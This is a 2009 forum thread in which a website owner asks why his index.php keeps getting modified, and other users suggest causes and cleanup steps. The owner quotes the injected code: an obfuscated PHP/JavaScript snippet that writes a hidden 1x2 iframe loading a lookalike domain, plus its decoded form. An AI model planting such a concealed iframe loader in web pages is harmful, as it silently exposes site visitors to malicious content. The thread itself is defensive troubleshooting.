Page 1 of 1

mysterious iframes injected into my index file

Posted: Mon Jul 06, 2009 4:11 pm
by flying_circus
Hey guys,

I haven't run across this problem before, but seemingly randomly, something keeps modifying my index.php file. Whatever is doing it removes my onload event from the body tag (this is what clued me into a change being made) and then it appends a javascript at the bottom of the page.

Code: Select all

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';?>
 
# Translated:
# <script>document.write(<iframe src="http://microsotf.cn" width=1 height = 2></iframe>);</script>
I understand that this is likely malicious, but what is modifying my page? The entire site is PHP and there is only 1 user entry form to send us an email. The rest of my code appears intact. Should I be going through all my code with a fine tooth comb or would you suspect a problem on my web hosts end? There are no public folders and this site has been online for almost 4 years with no problems until now. It also appears its ONLY the index.php file being changed, the rest of the site seems untouched.

Re: mysterious iframes injected into my index file

Posted: Mon Jul 06, 2009 5:34 pm
by jackpf
Some hosts automatically append stuff to files for stat tracking and stuff....

However, what other files are being included?

Re: mysterious iframes injected into my index file

Posted: Mon Jul 06, 2009 5:50 pm
by flying_circus
I've seen stat tracking code appended before on other sites, but I'm weary of this one.

I've created a simple php template for the site, so basically it includes a PHP header and footer, and menu system. It also links to my css file, and a jscript file as well.

Re: mysterious iframes injected into my index file

Posted: Mon Jul 06, 2009 6:36 pm
by jackpf
Well, in order to edit your source, the file has got to be included server side, so...if it's not your host it's in one of those files.

I'd change my ftp passwords and stuff though if I was you.

Re: mysterious iframes injected into my index file

Posted: Tue Jul 07, 2009 10:57 am
by Reviresco
I had something similar to this happen to two of my websites (both on Network Solutions). Despite removing the injected code repeatedly, it would always recur (except with different code each time). Changing FTP passwords didn't help.

Finally I went through every file and folder on the server and discovered some scripts that I had not placed there. I recall that they were placed deep within "images" folders. After I deleted them, the problems ceased.

So I would search your own directories for malicious scripts.

Until I found this, I kept a backup of each page that had been hacked. Every time the page was loaded, it compared it to the backup -- if there was any difference, it restored the backup, made a new backup, and emailed me. It worked, but obviously was just a bandaid.

Re: mysterious iframes injected into my index file

Posted: Tue Jul 07, 2009 11:32 am
by flying_circus
Thanks for the suggestions guys. I will start by scrutinizing the contents of my folders.

Re: mysterious iframes injected into my index file

Posted: Sun Jul 12, 2009 7:11 am
by zareef
jackpf wrote:Well, in order to edit your source, the file has got to be included server side, so...if it's not your host it's in one of those files.

I'd change my ftp passwords and stuff though if I was you.
Not only change the password but also make sure that you don't store them in your FTP client application.